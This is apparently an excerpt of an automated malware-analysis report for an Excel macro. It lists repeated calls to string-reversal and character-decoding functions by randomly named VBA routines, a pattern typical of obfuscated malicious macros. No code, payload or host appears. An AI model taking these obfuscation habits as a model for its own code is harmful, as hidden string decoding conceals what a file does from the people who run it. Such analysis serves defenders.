Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: Chr
Part of subcall function QhnsRALDv@ThisWorkbook: Asc
Part of subcall function QhnsRALDv@ThisWorkbook: Mid
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Len
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Mid
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: DoEvents
Part of subcall function DZfiJRzM5@ThisWorkbook: Len
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Chr$
Part of subcall function DZfiJRzM5@ThisWorkbook: Val
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Mid$
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function QhnsRALDv@ThisWorkbook: Len
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: Chr
Part of subcall function QhnsRALDv@ThisWorkbook: Asc
Part of subcall function QhnsRALDv@ThisWorkbook: Mid
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Len
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Mid
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: DoEvents
Part of subcall function DZfiJRzM5@ThisWorkbook: Len
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Chr$
Part of subcall function DZfiJRzM5@ThisWorkbook: Val
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Mid$
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function QhnsRALDv@ThisWorkbook: Len
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: Chr
Part of subcall function QhnsRALDv@ThisWorkbook: Asc
Part of subcall function QhnsRALDv@ThisWorkbook: Mid
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Len
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Mid
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: DoEvents
Part of subcall function DZfiJRzM5@ThisWorkbook: Len
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Chr$
Part of subcall function DZfiJRzM5@ThisWorkbook: Val
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Mid$
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function QhnsRALDv@ThisWorkbook: Len
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: Chr
Part of subcall function QhnsRALDv@ThisWorkbook: Asc
Part of subcall function QhnsRALDv@ThisWorkbook: Mid
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Len
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Mid
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: DoEvents
Part of subcall function DZfiJRzM5@ThisWorkbook: Len
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Chr$
Part of subcall function DZfiJRzM5@ThisWorkbook: Val
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Mid$
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function QhnsRALDv@ThisWorkbook: Len
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: Chr
Part of subcall function QhnsRALDv@ThisWorkbook: Asc
Part of subcall function QhnsRALDv@ThisWorkbook: Mid
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Len
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Mid
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: DoEvents
Part of subcall function DZfiJRzM5@ThisWorkbook: Len
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Chr$
Part of subcall function DZfiJRzM5@ThisWorkbook: Val
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Mid$
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function QhnsRALDv@ThisWorkbook: Len
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: Chr
Part of subcall function QhnsRALDv@ThisWorkbook: Asc
Part of subcall function QhnsRALDv@ThisWorkbook: Mid
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Len
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Mid
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: DoEvents
Part of subcall function DZfiJRzM5@ThisWorkbook: Len
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Chr$
Part of subcall function DZfiJRzM5@ThisWorkbook: Val
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Mid$
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function QhnsRALDv@ThisWorkbook: Len
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: Chr
Part of subcall function QhnsRALDv@ThisWorkbook: Asc
Part of subcall function QhnsRALDv@ThisWorkbook: Mid
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Len
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Mid
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
